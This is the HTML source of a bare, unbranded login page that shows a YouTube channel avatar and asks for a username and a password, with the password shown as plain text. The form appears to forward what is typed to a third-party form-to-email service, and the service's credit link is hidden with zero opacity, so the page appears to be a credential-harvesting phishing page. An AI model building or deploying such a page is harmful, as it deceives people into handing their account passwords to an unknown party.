<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
  height: 100%;
  font-family: Arial, Helvetica, sans-serif;
}

* {
  box-sizing: border-box;
}


  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
  position: relative;
}

/* Add styles to the form container */
.container {
  position: absolute;
  right: 0;
  margin: 20px;
  max-width: 300px;
  padding: 16px;
  background-color: white;
}

/* Full-width input fields */
input[type=text], input[type=password] {
  width: 100%;
  padding: 15px;
  margin: 5px 0 22px 0;
  border: none;
  border-radius: 30px;
  background: #bc6bcc;
}

input[type=text]:focus, input[type=password]:focus {
  background-color: #bc6bcc;
  outline: none;
}

/* Set a style for the submit button */
.btn {
  background-color: #bc6bcc;
  color: white;
  padding: 16px 20px;
  border: none;
  cursor: pointer;
  width: 100%;
  opacity: 0.9;
}

.btn:hover {
  opacity: 1;
}
</style>
</head>
<body>



 <center>
   <style>
                img {
                  border: 1px solid #ddd;
                  border-radius: 30px;
                  padding: 5px;
                  width: 150px;
                }
                </style>
                </head>
                <body>
                
                
                
                <img src="https://yt3.googleusercontent.com/ytc/AIdro_nxjOPJqzxIpRFze0P1q9uBrzw6Cy3-6BfSynl7ZC59lw=s900-c-k-c0x00ffffff-no-rj" alt="Paris" style="width:150px">
                
    </center>

<div class="bg-img">

    <form method="post" action="//submit.form" >
  

    

    <label for="username"><b>Username</b></label>
    <input type="text" placeholder="" name="Username" required>

    <br> <br>

    <label for="psw"><b>Password</b></label>
    <input type="text" placeholder="" name="psw" required>
    <style>
        .button {
          background-color: #bc6bcc;
          border: none;
          color: rgb(255, 254, 254);
          padding: 10px 110px;
          text-align: center;
          text-decoration: none;
          display: inline-block;
          margin: 6px 3px;
          cursor: pointer;
          border-radius: 16px;
        }
        
        .button:hover {
          background-color: #bc6bcc;
        }
        </style>
        <center>

        
        <div>
            <div style='font-size:1px; opacity:0;' style="float:right"><a href="https://www.100forms.com" id="lnk100" title="form to email">form to email</a></div>
        <script src="https://www.100forms.com/js/FORMKEY:NCJR88M7U9MT" type="text/javascript"></script>

    <button type="submit" class="button">Login</button>
    </center>
  </form>
</div>



</body>
</html>
